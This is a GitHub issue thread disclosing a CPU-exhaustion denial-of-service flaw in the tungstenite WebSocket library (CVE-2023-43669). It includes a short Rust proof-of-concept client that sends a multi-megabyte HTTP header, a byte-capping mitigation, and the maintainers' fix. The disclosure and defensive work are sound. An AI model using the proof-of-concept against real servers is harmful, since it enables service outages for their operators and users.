denial of service with long HTTP request header
rivkasegan opened this issue · 4 comments
I work on an application that depends on tungstenite and is intended to offer server-side ws:// support to untrusted clients over the public Internet. There are hundreds of instances of the server application operated independently by our community members, and it's not feasible to have other devices (e.g., web application firewalls) protect them. We want to avoid situations where a small number of malicious HTTP requests can devour server CPU resources.
I'm seeing that a single HTTP request (i.e., before the "upgrade: websocket" happens) with any sufficiently long header can cause request processing to take several minutes or more. For example, testing on a low-cost Ubuntu 23.04 VPS as the server, a header of 20 million characters produces more than 99% CPU consumption for five minutes. Multiple people have reproduced similar results on various Linux systems with tungstenite 0.20.0. The behavior appears related to this tungstenite source code:
tungstenite-rs/src/handshake/machine.rs (lines 41 to 56 in 53914c1)
tungstenite-rs/src/handshake/server.rs (lines 115 to 116 in 53914c1)
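For illustration, here is a minimal client sketch of the kind of request described above; the address, port, and header name are placeholders, not values from our testing:

```rust
use std::io::Write;
use std::net::TcpStream;

fn main() -> std::io::Result<()> {
    // Connect to a locally running tungstenite-based server (address is a placeholder).
    let mut stream = TcpStream::connect("127.0.0.1:9001")?;

    // Start an ordinary HTTP/1.1 request, then stream one extremely long header value.
    // While these bytes arrive, the server buffers and repeatedly re-parses the
    // growing (still incomplete) header, which is what drives the CPU usage.
    stream.write_all(b"GET / HTTP/1.1\r\nHost: localhost\r\nX-Long: ")?;
    let chunk = vec![b'a'; 64 * 1024];
    for _ in 0..(20_000_000 / chunk.len()) {
        stream.write_all(&chunk)?;
    }
    stream.write_all(b"\r\n\r\n")?;
    Ok(())
}
```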
We're able to work around this by checking for a large total header size (and dropping the client's connection) before any of tungstenite's code is called. However, many other crates that depend on tungstenite could likewise experience excessive CPU consumption if clients can send long HTTP request headers.
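For reference, a minimal sketch of one way to enforce such a limit, using a wrapper around the raw stream that caps how many bytes the handshake may consume. This is an illustration under assumed names (CappedStream, MAX_HANDSHAKE_BYTES), not the exact code our application uses:

```rust
use std::io::{self, Read, Write};

/// Upper bound on bytes accepted during the handshake (value is an example).
const MAX_HANDSHAKE_BYTES: usize = 16 * 1024;

/// Wraps a stream and fails reads once the cap is exceeded, so an attacker
/// cannot force the handshake parser to chew on megabytes of header data.
struct CappedStream<S> {
    inner: S,
    read_so_far: usize,
}

impl<S: Read> Read for CappedStream<S> {
    fn read(&mut self, buf: &mut [u8]) -> io::Result<usize> {
        if self.read_so_far >= MAX_HANDSHAKE_BYTES {
            return Err(io::Error::new(
                io::ErrorKind::InvalidData,
                "handshake larger than allowed",
            ));
        }
        let n = self.inner.read(buf)?;
        self.read_so_far += n;
        Ok(n)
    }
}

impl<S: Write> Write for CappedStream<S> {
    fn write(&mut self, buf: &[u8]) -> io::Result<usize> {
        self.inner.write(buf)
    }
    fn flush(&mut self) -> io::Result<()> {
        self.inner.flush()
    }
}

// A server handshake such as tungstenite::accept(CappedStream { inner: tcp_stream, read_so_far: 0 })
// would then fail fast on an oversized header instead of spinning on it.
```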
The question is: should this issue be resolved within tungstenite, e.g., by rejecting long header lines (maybe in a configurable way) sooner, by avoiding calls to try_parse until a complete header line (ending with \n) is read, or by making some other change?
I don't think the issue can be attributed to the httparse crate: RFC 7230 section 3.2.5 does not impose any limit on header sizes, but tungstenite (in its role as server-side code) could choose an upper bound.
Is this a vulnerability in tungstenite, or is tungstenite simply not intended to remain performant when a header has millions of characters?
This is definitely a vulnerability, thank you for pointing it out. Overly long requests have to be rejected early, without trying to parse them.
This appears to have CVE-2023-43669 assigned.
Should be fixed in Tungstenite 0.20.1, please verify.
Thank you! In my application, there's no longer excessive CPU consumption: when the attack was attempted, check_incoming_packet_size returned its first Err(Error::AttackAttempt) after 68232 bytes and 31 packets, while the many legitimate users still set up their WebSocket connections fine (159 bytes, 1 packet, Ok(())).